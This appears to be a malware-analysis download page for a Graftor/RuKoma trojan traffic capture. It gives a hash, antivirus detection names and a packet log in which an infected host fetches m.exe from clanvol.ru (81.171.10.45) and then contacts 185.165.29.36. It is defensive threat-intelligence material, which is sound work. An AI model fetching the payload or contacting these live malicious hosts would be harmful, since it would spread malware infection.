Graftor/Rukoma Malware Crimeware Traffic Analysis PCAP file download Sample

Download Attachments

  • 1 pcap m
    Date added: May 21, 2017 8:56 pm Added by: admin File size: 64 KB Downloads: 40
SHA256: d6142a44c2c8ea8c08c3ff346a7c4a6054bdcc5e39fa48c87ab1a300101da746
File name: m.exe
Detection ratio: 34 / 61
Analysis date: 2017-05-21 20:54:16 UTC ( 0 minutes ago )
Ad-Aware Gen:Variant.Graftor.371906 20170521
AhnLab-V3 Trojan/Win32.SelfDel.C1962528 20170521
ALYac Gen:Variant.Graftor.371906 20170520
Antiy-AVL Trojan/Win32.SelfDel 20170521
Arcabit Trojan.Graftor.D5ACC2 20170521
Avast Win32:Adware-gen [Adw] 20170521
Avira (no cloud) ADWARE/RuKoma.dtesq 20170521
AVware Trojan.Win32.Generic!BT 20170521
BitDefender Gen:Variant.Graftor.371906 20170521
Comodo TrojWare.Win32.AdWare.RuKoma.gedai 20170521
CrowdStrike Falcon (ML) malicious_confidence_67% (D) 20170130
Cyren W32/Trojan.IDYE-0652 20170521
DrWeb Trojan.Siggen7.22031 20170521
Emsisoft Gen:Variant.Graftor.371906 (B) 20170521
ESET-NOD32 a variant of Win32/Adware.RuKoma.F 20170521

2017-05-21 15:55:35.969425 IP 192.168.1.102.55371 > 81.171.10.45.80: Flags [P.], seq 0:391, ack 1, win 256, length 391: HTTP: GET /m/m.exe HTTP/1.1
E…..@….i…fQ.
-.K.P. .
..@3P…’x..GET /m/m.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: clanvol.ru
Connection: Keep-Alive

2017-05-21 15:56:19.037302 IP 192.168.1.102.55360 > 185.165.29.36.80: Flags [.], ack 194926600, win 0, length 0
E..(!/@…@….f…$.@.P.W.J..X.P…$$……..
2017-05-21 15:58:19.201163 IP 192.168.1.102.55360 > 185.165.29.36.80: Flags [.], ack 1, win 0, length 0
E..(!0@…@….f…$.@.P.W.J..X.P…$$……..

Leave a Reply